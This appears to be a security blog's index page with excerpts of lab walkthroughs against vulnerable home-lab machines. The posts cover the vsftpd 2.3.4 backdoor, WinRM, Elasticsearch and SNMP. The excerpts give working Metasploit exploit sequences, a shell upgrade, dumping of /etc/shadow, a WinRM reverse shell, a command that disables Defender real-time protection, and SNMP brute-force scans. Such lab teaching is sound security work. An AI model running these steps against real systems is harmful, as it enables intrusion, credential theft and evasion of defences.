Identifying and Exploiting Vulnerable Services

Exploiting Linux-based systems:
Fire up Metasploitable 2 Linux.
Scan the target using nmap:
nmap -A -p 21 172.30.1.134
Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4.
Search Google for "vsftpd 2.3.4 exploit".
We have an exploit module from Rapid7 itself.
Open up msfconsole:
sudo msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
6. Upgrade the shell using the command python -c 'import pty; pty.spawn("/bin/bash")'
7. Got a root shell on the target system and dumped the /etc/shadow file, where the hashes of the users' passwords are stored.
8. Save the credentials into a text file, making sure to edit out the unnecessary users from the output: ...

November 24, 2025 · 5 min · 979 words · 0x-s0M3n4th

WinRM Exploitation

In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems.

Exploitation:
Open Kali for scanning and exploitation. Open up msfconsole for the exploitation part:
sudo msfconsole
use auxiliary/scanner/winrm/winrm_cmd
msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140
RHOSTS => 192.168.83.140
msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
USERNAME => Administrator
msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1
PASSWORD => P@ssword1
By default, the command it will execute is ipconfig /all.
Remember the setup of the local user for WinRM access, where we gave access to the user sysadmin; let's try that:
It actually worked. Now let's try for a remote shell:
msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128
Also turn off real-time protection on your Windows Server, because it will quarantine the execution. Use this command in PowerShell on your DC:
Set-MpPreference -DisableRealtimeMonitoring $true
3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit.
4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system; if not, set it to false only. Let's see the options: ...

November 24, 2025 · 2 min · 313 words · 0x-s0M3n4th

Exploiting ElasticSearch Misconfigurations

Through the previous misconfigs, I should have full access to the Elasticsearch database. Let's see and exploit:
Reconnaissance of the database:
curl -X GET "http://192.168.83.140:9200"
curl -X GET "http://192.168.83.140:9200/_cat/indices?v"
_cat/indices: This is the API command to list all indices.
?v: This makes the output "verbose" (shows headers), so it's easy to read.
Why it's dangerous: This tells the attacker the names of all your databases, such as prod-users or customer-logs.
EXPLANATION OF THE INFO GATHERED FROM THE FIRST COMMAND:
"name" : "DC1"
...

November 24, 2025 · 7 min · 1297 words · 0x-s0M3n4th

SNMP Exploitation

Scanning for the SNMP service using nmap:
nmap -sU -sT -p U:161,T:161 192.168.83.140
2. Open msfconsole and use the module named snmp_enum.
3. Then run it: It has dumped all the network information, like services running, open TCP/UDP ports, network interfaces, file share information, storage information, file system info, device info, software components, and processes.
Using tools other than Metasploit:
NMAP:
nmap -sU -p 161 --script snmp-brute 192.168.83.140
2. snmpset: ...

November 24, 2025 · 4 min · 809 words · 0x-s0M3n4th